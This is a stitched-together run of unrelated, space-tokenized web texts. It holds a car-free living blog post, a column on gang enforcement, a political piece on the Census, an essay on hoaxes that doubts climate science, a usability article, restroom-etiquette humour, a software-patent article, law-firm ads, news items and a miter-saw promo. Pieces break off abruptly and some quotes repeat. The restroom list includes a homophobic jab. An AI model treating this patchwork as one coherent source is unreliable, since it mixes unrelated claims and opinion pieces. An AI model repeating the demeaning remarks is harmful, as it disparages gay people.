Biking to my friend Andrew 's house takes about 25 minutes , for example ; that 's only 10 minutes longer than it takes by car .
And biking to the nearest grocery store barely takes any time at all .
Now that I have a bike that fits me — and one specifically designed for city cycling — I 'm eager to make frequent use of it .
It 's been over a decade since I had a 1000 - mile year .
It 'd be great to ride that far again in 2010 !
My Feet
The bus and the bike are great , but the real revelation in alternate transportation this summer has come from my own two feet .
I 've been walking all over the place .
Kris and I do n't live in a very walkable neighborhood .
Despite a “ somewhat walkable ” Walk Score of 68 , there 's nothing much close by .
( In calculating walkability for us , the Walk Score counts two minimarts as grocery stores and two bars as restaurants — including one with the dubious distinction of being named “ the best dive bar in Portland ” . )
After I developed another running injury in June , I decided that I 'd have to get my exercise by walking .
That meant jaunting five or six miles each day to get the same time on my feet that I 'd spent running .
It also meant learning to see the surrounding communities in new ways .
For example , I 've always felt that the nearest city was too far to walk to .
It 's 2 - 1/ 2 miles to the near side of town and three miles to the far side .
But I recently made a deal with myself :
Once per week , I allow myself to go to the comic book store and to eat at the cheap taco place — but only if I walk .
Walking creates a barrier .
By setting this requirement , I can't just indulge myself on a whim .
It 's not just the comic book store and the taco stand , though .
I walk three miles to the credit union .
I walk a mile - and - a - half to the public library .
I walk a mile to the grocery store .
And once , I even walked two miles to the lawnmower repair shop , and then pushed my mower home .
I never thought I could make the time to walk five miles per day , but I was wrong .
And here 's something I 've learned :
Once you start walking five miles a day , your world gets bigger .
I know this seems counter - intuitive — a car takes you further faster — but it 's true .
You begin to realize that things are closer than you thought they were .
Walking is a great way to save money , see your neighborhood , and have fun .
Other Options
Although I may be new convert to alternate modes of transportation , many GRS readers have been working to reduce their car use for a long time , and for a variety of reasons .
On Twitter last week , I asked people to share their stories :
Here are some of the replies :
@apricotrabbit wrote : “ Between the bus & Zipcar , I do n't need a car in the city & I save tons of money .
Plus , I can read while someone drives me around . ”
wrote : “ Between the bus & Zipcar , I do n't need a car in the city & I save tons of money .
Plus , I can read while someone drives me around . ” @mrawdon wrote : “ I 've been biking to work twice a week this summer , for the exercise .
Cuts down on gas consumption significantly , too . ”
wrote : “ I 've been biking to work twice a week this summer , for the exercise .
Cuts down on gas consumption significantly , too . ” @grouchyladybug wrote : “ i take the train & bus to work b/c it 's cheaper & more relaxing than driving ”
wrote : “ i take the train & bus to work b/c it's cheaper & more relaxing than driving ” @sarahperiwinkle wrote : “ I take the commuter rail b/c its free with employer transit pass , w/ in walking distance of home and work , and as fast as car . ”
wrote : “ I take the commuter rail b/c its free with employer transit pass , w/ in walking distance of home and work , and as fast as car . ” @jessemecham wrote : “ is a sweet scooter alternate transportation ?
70 mpg and I look good .
( Yes , it was partially to save gas ) . ”
wrote : “ is a sweet scooter alternate transportation ?
70 mpg and I look good .
( Yes , it was partially to save gas ) . ”
It 's important to note that not everyone likes biking or taking the bus .
I heard from some people who wish they could use a car more often , or who opt not to use other methods because they 're inconvenient .
Conclusion
Not all Americans have the luxury of being able to explore alternate means of transportation .
For good or ill , we 're a car - centric nation that has built car - centric cities that encourage us to stay in our automobiles .
But I suspect that there are a large number of people who could travel by bus , bike , or feet — if they only realized how easy it is .
( That was certainly true in my case , anyhow . )
For some people , time is an issue , but I have intentionally created a lifestyle that allows me an opportunity to explore more leisurely modes of transportation .
All of this is well and good during the warm , dry months .
But what happens when the Oregon rain returns in mid-October ?
I 'm not sure .
I suspect my bicycle will go into hibernation , I 'll only walk a couple of times each week , and I 'll really get to learn how Portland 's bus system works .
And my spending on gas and car maintenance will continue to drop .
Walking photo by The Giant Vermin .
Bus photo by Jason McHuff , who appears to be something of a bus fanatic .
Consider violent crimes committed by drug gangs .
In many cities , such gangs are too numerous for police to watch them all closely .
Knowing that they are unlikely to be caught and punished , members can violate the law with impunity .
In such situations , Mr. Kleiman argues , the police can gain considerable leverage just by publicizing an enforcement priority list .
Image Credit ... David G. Klein
It is an ingenious idea that borrows from game theory and the economics of signaling behavior .
To see how it works , suppose that all drug violence in a city is committed by members of one of six hypothetical gangs  the Reds , Whites , Blues , Browns , Blacks and Greens  and that the authorities have enough staffing to arrest and prosecute offenders in only one gang at any one time .
Mr. Kleiman proposes that the police publicly announce that their first priority henceforth will be offenders in one specific gang  say , the Reds ( perhaps because its members committed the most serious crimes in the past ) .
This simple step quickly persuades members of that gang that further offenses will result in swift and sure punishment .
And that is enough to deter them .
With the Reds out of action , the police can shift their focus to the Whites .
They , too , quickly learn that violent offenses result in swift and certain punishment .
So they quiet down as well , freeing the police to focus on the Blues , and so on .
But why do n’t the Reds , seeing that the police have moved on , start committing violent offenses again ?
The reason is that they always remain atop the enforcement priority list .
If they start offending again , police attention will again quickly focus entirely on them .
After a few rounds , Mr. Kleiman argues , the Reds will get the point .
In like manner , one gang after another is pacified , even though the police have no more resources than before .
Considerable evidence supports Mr. Kleiman ’s emphasis on the efficacy of immediate sanctions .
Experimenters have found , for example , that even long - term alcoholics become much less likely to drink when they are required to receive a mild electric shock before drinking .
Many of these same people were not deterred by their drinking ’s devastating , but delayed , consequences for their careers and marriages .
There are many unanswered questions about the tragic hanging death of Bill Sparkman , a US Census Bureau employee , in rural Kentucky .
But one thing is clear .
Right - Wing leaders like Congresswoman Michele Bachmann and media outlets like Fox News have whipped up hysteria and paranoia over the 2010 Census .
Mr. Sparkman ’s untimely demise may or may not have been the doing of an anti-government fanatic , but it ’s clear that the Right is creating an environment that is hostile to Census workers and the Constitutionally - mandated Census .
A steady stream of conspiracy talk by Beck , Bachmann , and others on Fox News has legitimized and propelled conspiracy theories among many everyday Americans who are now terrified of their own government .
Talk of rounding up dissidents into concentration camps and nefarious plots by ACORN to steal Congress has fed anti-government sentiment , which could boil over at any moment .
This should be an important wake - up call to those national outlets that have employed fear in pursuit of ratings .
Here is a video compilation of recent Fox News coverage of the 2010 Census — featuring Beck and Bachmann among others — along with three amateur YouTube videos created by Americans who fear the Census :
Few of us can easily surrender our belief that society must somehow make sense .
The thought that the state has lost its mind and is punishing so many innocent people is intolerable .
And so the evidence has to be internally denied .
~ Arthur Miller
The politically correct , the self - righteously indignant , and other defenders of the established order , have been clucking furiously in the direction of the Colorado family whose six - year old son was reportedly set adrift in a box with a helium - filled balloon .
The mainstream media — always on the lookout for stories that deflect popular attention away from events of genuine substance — gobbled it up like kids at an ice - cream party .
For hours , thoughtful men and women who had given up worrying over the fate of a teen - aged girl on Aruba , now had an alternative outlet for their ersatz feelings .
Hours later , however , the young lad was found safely hiding away at home .
Government officials immediately suspected the entire affair was the product of an elaborate hoax , perpetrated by the parents for the purpose of promoting themselves into the world of so - called " reality - show " fame .
The county sheriff began spinning out all kinds of possible charges to file against the parents , as well as bringing the government ’s stiff - necked child protective services agency in for further harassment .
Because the father had called the Federal Aviation Administration to report the incident , possible " lying to the federal government " charges were also threatened .
( On the latter point , I have often wondered why it is considered a felony for individuals to lie to the government , but quite acceptable for government officials to lie to the public !
But I am getting ahead of my story . )
In Restraint of Trade : ... Butler Shaffer , Butler ... Check Amazon for Pricing .
Shortly after this , a person claiming to be an official of the U.S. Chamber of Commerce told a gathering at the National Press Club that his organization was no longer opposing the climate change legislation before Congress .
" There is only one way to do business and that is to pass a climate bill quickly so this December President Obama can go to Copenhagen and negotiate with a strong position , " this purported Chamber spokesman declared .
In a political system that can best be described as corporate - statism , it would not be all that shocking to imagine the Chamber — many of whose more prominent members have long been active promoters and beneficiaries of governmental intrusion into economic matters — finding climate change legislation useful to their myopic ends .
As I have shown in my book , In Restraint of Trade , the U.S. Chamber of Commerce was , perhaps , the principal architect of the National Industrial Recovery Act , the keystone to FDR ’s New Deal .
Its state - centered attitude was no better expressed than in the words of Chamber President Henry I. Harriman who , prior to Roosevelt ’s election , warned that those who did not " cooperate " with the recovery proposal would " be treated like any maverick .
They ’ll be roped , branded , and made to run with the herd . "
That support for this current legislation might be just another effort by corporate leaders to benefit at the expense of others would not be all that surprising .
But any such illusions were quickly put to rest when , during the press conference , another man — identifying himself as an official with the Chamber — repudiated the speaker as a hoaxster , and not a spokesman for this most prominent business association .
Who , then , had been impressing his audience with claims of Chamber support for the climate change bill ?
He was later identified as a member of Yes Men , a group of environmental activists .
They saw in this press conference an opportunity to bring attention to their cause .
The media — whose years of being under the influence of Washington , D.C. has made it unable to distinguish hoaxes from reality emanating from that city — was the appropriate audience for this bit of fakery .
Animal Farm George Orwell Best Price : $ 2.34 Buy New $ 9.20 ( as of 04:45 EST - Details )
Perhaps the Colorado sheriff who reacted to the helium - balloon incident got to the essence of the political mindset that has , for decades , infected modern society .
In speaking of the possibility that the parents were using the event as a way of self - promotion , the sheriff referred to so - called " reality - show " television as something that blurs " the line between entertainment and news . "
As newspapers , news magazines , and broadcasters , wring their collective hands over the continuing decline of subscribers and viewers , they might consider the role they have long played in this line - blurring .
I am amused at the reaction of government officials who feign indignation — and threaten criminal prosecution — over individuals or groups who engage in harmless hoaxes to promote their interests , but who pip not a squeak when the state — with the support of its paid propagandists ( AKA as the mainstream media ) — actively fosters hoaxes that serve its ends .
Why does this self - righteousness not rise to the level of demands for the criminal prosecution of those who fabricated — and continue to operate — that deadliest of recent hoaxes , the so - called " war on terror ? "
How many people died — or were even injured — in the helium - balloon affair ?
How many more innocent souls — including children who have not been brought under the alleged " protection " of " child protective services " — have died in the course of conducting this murderous campaign grounded in lies , forgeries , and the shrill shrieking of vice - presidents and cabinet heads ?
I have never engaged in hoaxes : my mind simply does n’t work that way .
But I do see both the epistemological and social importance of such activities , particularly when the nature of the hoax has been revealed .
I am reminded of the role played by the " joker " in medieval society .
He was a bright person , whose general irreverence for established interests allowed others to observe and to laugh at the absurdities present in the society in which they lived .
Such influences fostered the kind of questioning perspective that helps to define a mature civilization .
The joker has been replaced by a few good comedians ( e.g. , Eddie Izzard , and the late George Carlin ) as well as by hoaxsters whose performance art often reveals what those in authority want to keep hidden .
I love it when politicians , the media , and academia get caught up in their own webs of deception ; not out of any misguided sense of punishment I have , but as a reminder that those who imagine themselves to be the purveyors of " the good , the true , and the beautiful , " often speak from hidden agendas , including their ambitions for power over others .
Just as an occasional germ or virus is useful to give our immune systems a health - generating workout , the exposure of hoaxes can serve to keep our minds in a skeptical , life - defending state of awareness .
Boundaries of Order : P... Butler D. Shaffer Best Price : $ 8.25 Buy New $ 989.90 ( as of 11:14 EST - Details )
One of the more powerful literary images relating to this inquiry is to be found at the conclusion of George Orwell ’s Animal Farm , when the ruling class of pigs are meeting in the farm house with the local businessmen to discuss such matters as the selling of the older horses to the glue factory ( a wonderful metaphor for modern corporate - statism ) .
The other animals watch through the window and , as the story ends , a heightened sense of awareness is seen in their eyes .
The Internet and other innovations in technology are providing windows through which members of a long - gulled public are beginning to have the scales fall from their eyes .
Hoaxes have a way of mirroring — and making more evident — the contradictions and falsities of what the established order requires us to believe to be true .
This is why the factual reporting of events ( see , e.g. , Jon Stewart ) takes the place of satire in an increasingly absurd world .
Or , as G.K. Chesterton expressed it : " We have had no good comic operas of late , because the real world has been more comic than any possible opera . "
This is why I literally broke out in laughter when , following the revelation of the environmentalists ’ hoax at the National Press Club , CNN ’s Wolf Blitzer reminded viewers — along with , perhaps , the alleged news reporter at his channel ? — of the importance of " checking and double - checking " the facts upon which a story is based .
I wonder if that sense of skepticism will accompany future reports , by CNN , of such matters as the unprovoked wars against the Iraqi and Afghan people ; wars that CNN joined with other mainstream media outlets to promote despite all the official state - serving lies that underlay both .
I wonder , as well , whether the reporting of future hoaxes — disguised as " press conferences " — will contain the caveat of doubt aroused by the Yes Men , as well as Al Gore ’s global - warming film that earned him an Oscar from an industry that specializes in fiction and fantasy .
I have my doubts as to whether Wolf ’s future reports on the alleged threats posed by climate change will be prefaced by any reminders of the hoax perpetrated at the National Press Club .
Nor do I expect to hear
Wolf tell us how his " checking and double - checking " of facts led him to discover the words of , perhaps , the leading guru of the " climate change " lobby , Stephen Schneider .
After his 1980 conversion from the " coming ice age " denomination to that of " global warming , " Schneider told the faithful that " we have to offer up scary scenarios , make simplified , dramatic statements , and make little mention of any doubts we might have . "
The political establishment does not like having its deceptions and contrived " threats " revealed to the rest of us animals , and will do what it can to close the blinds on its windows , lest we peer in on the rackets being played at our expense .
When such exposures do occur , political and media voices will be quick to shift to damage control in order to minimize any broad awareness of the nature of the state .
" Victims " will become " wrongdoers " ; " Cassandras " will be transformed into " co-conspirators . "
Through it all , our would - be rulers will continue to insist upon the inviolability of their monopoly on the definitions of " truth " and will go after those who — like the parents of the six - year - old boy in Colorado as well as other uncertified hoaxsters — bring discredit upon the efforts of the state to keep us in that state of what Goethe called " active ignorance . "
As long as their efforts impose no injury upon others , I regard hoaxsters as essential to efforts to help restore sanity to an insane world .
The Best of Butler Shaffer
Standard information architecture ( IA ) focuses on how to best structure material within a single site , while Micro - IA focuses on dividing a single topic 's content across several pages .
With Mega - IA , the question broadens : How can you best distribute content across your website(s ) and outside services ?
We 're currently running user studies of social media .
One of our findings is that the mega-IA decision to host some services on external sites can create usability problems for your customers .
Bad Example : Massachusetts Governor 's Site
The Massachusetts Governor 's Office hosts its videos on YouTube , resulting in reduced usability .
As the following screenshot shows , the same video is represented thrice in the UI , eating up precious pixels and forcing users to scroll if they want to see more video options .
Countless usability studies show that it's bad to duplicate features on the same screen because it often confuses users , creating uncertainty about what they 've already seen and whether the two seemingly identical features are actually different .
Of course , triplicating features is even worse .
The MA Governor 's site also features poorly chosen thumbnails :
Judging by these thumbnails , 3 of the 4 videos are almost identical .
The Web is all about choice ; video links must differentiate the videos and help users choose which ones to watch .
The 3rd thumbnail — representing the gripping topic of the gubernatorial hip — does n't visually indicate the content at all .
It 's hard enough to make good thumbnails for still images ( mistake # 4 of the top - 10 Web design mistakes of 2003 ) .
Videos are even harder to depict in thumbnails .
Still , it 's much better to choose an image based on editorial criteria than to let YouTube randomly pick a frame .
The above thumbnails make the videos look supremely boring .
Most likely , they are boring , but most people wo n't ever know that because of the viewer - repellant thumbnails .
Downplaying talking - head videos for online viewing is an obvious and long - established guideline .
As this example shows , just because YouTube is hot does n't mean that you 'll get a good multimedia site by pouring your video content into one of its templates .
Better : Use Categories to Guide Users
Let 's compare the YouTube presence for Martha Stewart ( cooking and homemaking guru ) and Harvard Business Publishing :
Martha Stewart has much better thumbnails than the MA Governor , though admittedly her topics are far more photogenic .
However , users get no help here ( other than search ) to find videos on a particular topic .
Relying solely on social features such as " most viewed " and " most discussed " provides insufficient IA support .
Want to make blueberry pie ?
Prepare to scroll through 126 videos .
Harvard Business
Publishing shows a starting point for better structure , dividing its video into 3 categories according to topic :
Of course , the thumbnails offer no help in differentiating the categories , unless you think that close - up headshots are more strategic than torso shots .
The underlying problem is that YouTube 's features are designed for casual social networking , and topic - focused websites need more options for organizing , categorizing , and presenting content .
You can improve YouTube usability somewhat by writing better titles and descriptions that comply with our writing for the Web guidelines .
Comparing the above examples , the MA Governor site 's writing is clearly the worst , further muddling the user experience .
" Governor Patrick Announces the Special " — special what ?
It 's miraculous that this zero - information - scent video link collected a whopping 49 views from among the state 's 6.5 million residents .
The Risks of Outsourcing
Clearly , usability suffers when an organization puts its website content on social sites without adapting it to the particular site 's features .
Usability suffers even more when those features are optimized for a use that differs from what the company 's customers need .
These arguments count in favor of keeping social features on your own site where you can design them to provide a better user experience for your customers .
By doing so , however , you give up on the potentially much bigger audience that 3rd - party social networking services ( SNSs ) offer .
Beyond usability , outsourcing social features entails an even bigger , strategic risk : by relying too much on external SNS sites for your social features , you might be handing them the keys to the kingdom .
Websites have already lost much of their value to search engines by making them the entry - point to the Web 's riches .
When people have questions or want to accomplish tasks , they turn to their preferred search engine — which is why search engines collect billions and content sites collect peanuts , despite the fact that they 're the ones actually satisfying the users ' needs .
If websites train users to turn to a handful of SNS sites for the next level of Internet activities , history will likely repeat itself , further diluting the value of those sites that actually produce content and services .
It 's too early to provide definite advice for how to resolve this conundrum .
One possible approach is to feed the outside sites only broadly targeted material that might go viral and / or attract casual browsers , while keeping higher - value specialized material on your own site , including any action - oriented and need - to - know content and discussions .
The broad material can then drive traffic to the specialized content , as can e-mail newsletters and other standard tactics that foster loyalty to your own site 's services .
While the big picture is still unresolved , there 's no doubt about the everyday design implications of hosting any material on other sites .
Do n't just use the default template , and definitely do n't assume that simply dumping stuff onto a popular SNS will automatically make you popular .
As always , design for usability — both in terms of everlasting guidelines for things like IA and writing , and in terms of newer guidelines for using newer features .
As a man , there are some rules that are simple , finite , and unquestionable .
Many of us men work in an office building with public restrooms .
As a result , we stumble upon men ’s room faux pas on a weekly basis .
They irritate us more and more every time .
Some men do n’t seem to understand these social constructs .
We ’re willing to bet that every man who reads this can relate to at least one of these .
Most events occur at the urinal because apparently a lack of walls equals a lack of personal space .
Do n’t be one of these guys …
1 ) CHATTY KATHY
There is no reason to speak to another man within the confines of the men ’s room .
The sole exception is at the sinks .
Even then , the conversation should be limited one or two words per person .
We ’re not women , do n’t pretend to be one .
When at the urinal , you face straight ahead and nothing short of a nuclear attack should break your focus .
You also cease all conversation .
No one wants to talk to you when you have your dick in your hand .
Most men have once walked into the men ’s room with a co-worker ( purely coincidental ) and he tried to continue the conversation once inside .
It is up to you to put an abrupt halt to that dialogue with a stern “ DUDE ! ” .
He might still not get it .
He ’s a moron .
Also , speaking to a man in another stall should be punishable by law .
Check your TP supply upon entering .
No excuses .
2 ) THE MOBILE MORON
Expanding on the Chatty Kathy , it should go without saying that cell phone use is unacceptable as well .
Nobody wants to hear you on your phone , regardless of whether you use a bluetooth headset or not .
Let it go to voice mail , call the person back .
You should only be in the bathroom for a few minutes , business can wait .
Please do n’t hold a conference call while another man is pinching a loaf .
Ugh .
The exception , of course , is smartphone usage while sitting on the shitter .
Keep the volume off , and then feel free to crush all the candy you ’d like , as long as nobody else is waiting to use the pot .
Lastly , even if you ’re Brad Pitt , camera usage or selfies are strictly prohibited .
Cmon man !
3 ) THE SUPERMAN
This guy is so damned irritating .
He will stand at the urinal , both hands on his hips and taking a leak like it ’s some kind of GD magic trick .
Do yourself a favor , do the next person to use that urinal a favor , do the cleaning lady a favor , AIM YOUR SHIT !
The puffed out chest that can accompany this pose is either a method of aiming or he ’s just trying to show off .
This guy is an ass .
5 ) THE WALL LEANER
This special brand of jackass finds it necessary to turn the area into his own private lounge .
He ’ll usually sigh audibly to announce his presence , find a urinal next to the wall , and flop against said wall like a bear teetering on hibernation .
He ’ll take his leak at an angle , tempting fate and physics the entire time .
Hey asshole , need a rest ?
Use the stall .
5 ) THE PECKER PEEKER
This closet case will peer over at your junk while standing next to you at Urinal Row .
This guy is easy to pick out if there are dividers between the units ( as God intended ) .
It ’s a bit more subtle a move if there are no dividers .
This goes back to the original point , eyes straight ahead .
Move your head to the side , you ’re gay .
Unless , of course , you are trying to search for a Miami Dolphins Super Bowl ring missing a gemstone .
Even then you ’ll probably end up making out with a dude .
Lesson learned , Ace . Lesson learned .
1 2 3 4 next »
In re Bilski - Let us get back to work
by Richard Hillesley
The case known as " In re bilski " has the potential to go some way towards righting some of the wrongs of the patent industry , while coincidently , transforming the prospects for innovation in the information and software industries .
During the last few years , the United States has witnessed a proliferation of patents in industries that are central to the information economy , despite a wide belief that the rush to patents and business models based on ' Intellectual Property Rights ' has the effect of restricting the flow of information and inhibiting innovation .
In 1999 , the United Nation Development Program 's ' Human Development Report ' came to the conclusion that " the relentless march of intellectual property rights needs to be stopped and questioned " because of the regressive effects of patent law on health , trade and economies in the developing world .
A generic mousetrap
Software evolved in a climate free of patents , but a relaxing of the rules by the United States Patent and Trademark Office ( USPTO ) has lowered the bar for patent claims .
During the last two decades , thousands of software patents have been issued on business methods , data structures and process descriptions that take no account of how software is developed - and this effect has been enforced around the world through the auspices of the World Intellectual Property Organisation ( WIPO ) and the World Trade Organisation ( WTO ) .
Because software deals in language and the expression of mathematical constructs and ideas , advocates of free software have argued that code should be treated in the same way as the written word , which is subject to copyright .
Patents on software are , in effect , a tax on ideas .
We are obliged to search and exclude the idea that someone else may have claimed ownership to , or pay the price for having the same idea .
Eben Moglen of the Software Freedom Law Center ( SFLC ) takes the view that : " Software patenting has been a scourge in the global technology industries , " and that " computer programs should be as ineligible for patent protection as mathematical equations or precise descriptions of physical laws . "
This position is elucidated in the opening paragraphs of the UK Open Rights Group 's page on software patents where it says that : " Advances in software are advances in abstraction .
While traditional patents were for concrete and physical inventions , software patents cover ideas .
Instead of patenting a specific mousetrap , you patent any ' means of trapping mammals ' or ' means of trapping data in an emulated environment ' .
The fact that the universal logic device called a ' computer ' is used for this does not constitute a limitation .
When software is patentable , anything is patentable . "
I own the world
The problem for computer professionals is that almost everything has become patentable .
A succinct expression of this truth was provided by Bill Gates in the much quoted Microsoft internal ' Challenges and Strategy ' memo , dated May 16,1991 .
" If people had understood how patents would be granted when most of today 's ideas were invented and had taken out patents " , he wrote , " the industry would be at a complete stand - still today . "
Rather more revealingly , Gates concluded that the " solution " to the problem of patents was " patenting as much as we can ...
A future start - up with no patents of its own will be forced to pay whatever price the giants choose to impose .
That price might be high : Established companies have an interest in excluding future competitors . "
Microsoft has since put this lesson into effect .
A timely reminder of what is at stake in the Bilski case is provided by the lawsuit for patent infringement that has been filed by Eolas Technologies Inc. against 23 technology companies for embedding plug-ins into browsers .
Eolas did not invent the browser or the embedded technologies which have come since , but owns a patent on a broad and obvious programming concept which has been applied to technologies that were unimagined at the time .
This patent has the capacity to inhibit the progress of the Web for years to come , as Tim Berners - Lee explained in his submission to an earlier court - and if the patent is upheld Eolas can expect a return in the billions of dollars .
This effect , of inhibiting innovation and the interchange of ideas , is not offset by the theoretical ability of individuals and SMEs to take out patents of their own .
The patent industry is dominated by the giants and the lawyers they employ , as Robert Barr , vice president and worldwide patent counsel for Cisco Systems , explained in 2002 :
" Obtaining patents has become for many people and companies an end in itself , not to protect an investment in research and development , not to license technology to others who need it , but to generate revenue through licensing ( ' holding up ' ) other companies that actually make and sell products without even being aware of their patents ...
This provides opportunities for contingency fee litigators , for licensing companies and consulting firms who claim to help people ' mine ' their patent portfolios for patents that even they did n't know they had . "
" It 's hard to see how this contributes to the progress of science and the useful arts , " Barr concluded .
Next : Abstractions and Transformations
1 2 3 4 next »
Print Version | Permalink : http://h-online.com/-837618
Must Watch -
This real video footage was obtained from a store security cam by the personal injury lawyers at Bergen Law on behalf of our client involved in this pedestrian - car accident .
We Take Action Before Your Evidence Disappears !
About this Real Case Video Evidence
The Bergen Law team knows it is crucial to collect evidence quickly after an accident before it disappears forever .
That 's why our lawyers acted quickly to obtain from a store owner this video footage involving a client who was the victim of a car accident .
This footage was critical in getting a just and fair settlement of the personal injury case .
The personal injury attorneys at Bergen Law are committed to building the best personal injury case possible to get you the compensation you deserve .
As such , Douglas Standriff and Marissa Messinger do n't rely solely on police reports and witness accounts for information about your accident .
Having accumulated decades of experience building compelling personal injury cases , they have the resources and expertise to acquire the evidence needed to ensure a fair and equitable settlement .
Act Quickly !
If you or your loved one has been the victim of an accident , you must retain an injury accident attorney who has the experience and resources to collect important evidence while it can still be collected .
With over 28 years of experience , we have the expertise to build a strong personal injury lawsuit to get you the fair and just compensation you deserve !
Get a Free , No-Obligation , Confidential Consultation Today !
St. Louis & St. Charles Divorce & Family Law
Personal Attention .
Professional Representation .
Proven Results .
Divorce and separation .
Custody of your children .
Supporting yourself and your family after the breakup .
Untangling years of building a life as a single unit and transitioning to separate , distinct lives feels daunting even under the best of circumstances .
No matter how “ together ” you seem to your friends or even yourself , when a relationship ends , your emotions are highly charged , the pain is still too close to the surface , and fear of the uncertain future hovers overhead .
In a word , you are vulnerable .
At such a delicate moment , with so much at stake , you need someone you can trust by your side , someone on your side .
A family law and divorce attorney with the experience , skill , and understanding to guide you through the legal maze you must navigate to insure your ability to properly care for yourself and your family after a divorce or legal separation .
At these times when a marriage is falling apart , there are many difficult questions that need to be addressed ; questions you hoped you would never have to think about :
We will help you find answers .
Cho Seung - Hui shot dead 32 people at Virginia Tech in 2007 Virginia Tech killer Cho Seung - Hui repeatedly told counsellors he did not harbour suicidal or homicidal thoughts , newly released health files indicate .
The documents include those that were found last month , two years after Cho killed 32 people at the US university .
The records indicate the therapists found Cho depressed and anxious but saw no evidence he would commit violence .
The medical treatment of 23 - year - old Cho , who committed suicide , has been a major issue in the investigation .
The records released on Wednesday cover Cho 's dealings with the counselling centre at Virginia Tech - two phone conversations and a subsequent face - to - face session .
They include files discovered last month in the possession of a former employee of the Cook Counseling Center by legal teams of some of the victims ' families .
In the records , the counsellors noted that Cho denied thinking about suicide or murder .
Cho met counsellor Sherry Lynch in December 2005 after he was detained in a mental hospital overnight because he had expressed thoughts of suicide .
" He denies suicidal and / or homicidal thoughts .
Said the comment he made was a joke .
Says he has not reason to harm self and would never do it , " Ms Conrad wrote in her evaluation .
She urged him to return for counselling the following term .
He was not seen again by the centre .
Treatment " The absence and belated discovery of these missing files have caused pain , further grief and anxiety for families of the 16 April victims and survivors , " a statement by Virginia Tech said .
" With release of these records , Virginia Tech seeks to provide those deeply affected by the horrible events of April 2007 with as much as is known about Cho 's interactions with the mental health system 15 - 16 months prior to the tragedy . "
Cho , a South Korean student , targeted students and staff during his rampage at the college in Blacksburg , Virginia .
As police moved in , he committed suicide .
Much of the investigation has centred on the events of the day , and how the police , and the staff at Virginia Tech , reacted to the unfolding events .
But some survivors , and families of the victims , say they are more concerned about the treatment Cho received at the counselling centre .
While most of the survivors and relatives of the victims accepted an $ 11 m ( £ 6.6 m ) settlement from the state in April 2008 , two families earlier this year took out a civil suit against the state , the school and its counselling centre .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Astros advance and the Twins just can't win
Houston got a go - ahead homer from Carlos Correa and swept its series with Minnesota , which dropped its 18th straight playoff game .
Braves , Marlins , A's also win »
A teenage girl has been taken in by the Administration for Children 's Services after she was found wandering Times Square with near - total amnesia around midnight on October 9th .
The girl , who is probably between 14 and 17 , is 5 - foot - 6 , medium build , light complexion , short , with straight blonde hair and blue eyes .
She has pretty much zero recollection of her past , and has said , " I just want to know who I am .
I want to know who I am , and what happened to me . "
But there are only a couple obscure clues to her identity .
The young woman has written down the name " Amber " and responded to the name on one occasion , but she does not know if that 's actually her name .
She also recalled words from a fantasy novel called Fool 's Feteby the author Robin Hobb .
According to the Post , she has been writing her own fantasy fiction about a heroine named Rian " who ’s been raised by the commander of the guard post on the edge of a fantasy kingdom . "
A source tells the Daily News , " It looks like she 's been walking around for a while .
She 's being treated as a runaway . "
Anyone with information is urged to call 1 - 800 - 577 - TIPS , or log on to Crime Stoppers .
Hopefully someone will come forward , and she wo n't wind up in advertising like Kermit did after getting amnesia in The Muppets Take Manhattan .
For any work to be done efficiently , tools have to be availed in their perfect state .
Without which , it would be a lie to say that work is moving on smoothly .
If you are working online , you will need a stable internet connection .
The same applies when you are into the woodwork .
All the necessary tools have to be availed in their best shape .
Since the point has been driven home , we shall focus on a specific tool which is the miter saw .
Here are some features that will lead you towards the right tool .
Tranquility
Not everyone loves to work in a noisy environment .
On the contrary , we are naturally able to work conveniently in a quiet environment .
For a miter saw to meet your specific needs , it must be quiet when you turn it on to operate it .
Sure it ’s a very rare quality , but with time , you can locate it without expecting it .
What ’s more , it ’s easier to find it when you look in all the right places .
A noiseless miter saw is the dream of everyone who is passionate about woodwork .
This factor will also see to it that your concentration levels are within your control .
Work will move smoothly and faster at the same time .
Efficient Controls
How would you like to operate a miter saw whose controls are within your reach ?
Guess what .
This is more than possible .
The likes of Bosch GCM12SD DB Glide has this excellent feature and a lot more to look forward to .
Imagine the possibility of two controls to switch it on and off in case it gets out of control .
This only calls to show that your safety is guaranteed .
This make also requires you to study it keenly to avoid making unnecessary and costly mistakes .
This does n’t imply that it is a bit on the complex side for you to understand .
On the contrary , you will love every minute of working with it .
The manufacturers placed these controls specifically for the reason of convenience .
Prepare to enjoy your work all the more .
Durability
Having to come up with a new budget for some reason is never easy .
This is especially in the case of miter saws .
You are better off when you pick a model that wo n’t easily wear off .
The best thing about the durability factor is that it will save you money .
With a durable miter saw , you can reach even the most hidden spots that your work requires .
It ’s a joy to work with a tool that never shows any signs of wear and tear .
Worse still , it should deliver perfect results just as it did when it was brand new .
The ball is in your court for you to find a genuinely strong tool to work with .
Availability
It is n’t possible to go for something that is nowhere in sight .
A good miter saw will never leave the market especially when most people are in dire need of it .
On the bright side , you will have an easy time trying to locate the one that suits your criteria .
Most importantly , choose your shopping site wisely to avoid getting stressed out .…
New York City to expand Ring of Steel 's coverage
Published 5 October 2009
The system of surveillance cameras ; license - plate readers ; and chemical , biological , and radiological sensors that protect lower Manhattan will expand to cover mid-town
The network of surveillance cameras ; license - plate readers ; and chemical , biological , and radiological sensors that protect lower Manhattan will expand to cover mid-town ( see 1 April 2009 HSNW ) , Mayor Michael Bloomberg and Police Commissioner Raymond Kelly announced yesterday .
The city will use the $ 24 million provided by a grant from DHS to blanket the streets between 30th St. and 60th St. , from the East River to the Hudson River , with enough security technology to hopefully sniff out a terrorist attack before it can occur .
The area contains some of the city ’s most notable landmarks , including the Empire State Building , the United Nations , and Grand Central Terminal .
Bloomberg , according to the New York Daily News , called the project the city ’s “ No. 1 priority , and it comes before all fiscal concerns . ”
The original Lower Manhattan Security Initiative , modeled off of London ’s Ring of Steel , allows police to watch over some of the most valuable real estate in the world , reports MyFox New York , from “ Canal Street to Battery Park from river to river , a 1.7 square mile area in which the New York Stock Exchange , Federal Reserve , Brooklyn and Manhattan Bridges , World Financial Centers , World Trade Center memorial site , PATH train and numerous major financial institutions . ”
Matthew Harwood writes that the Lower Manhattan Security Coordination Center , established last year in the Financial District , will operate as the brain of both security initiatives , processing the perpetual flow of images and data relayed by the technology networks .
The command center relies on cameras provided by private companies and allows representatives from major corporations to work alongside police .
Despite the $ 24 million grant from DHS , Bloomberg remains irritated that more security assistance is n’t forthcoming , according to the Daily News .
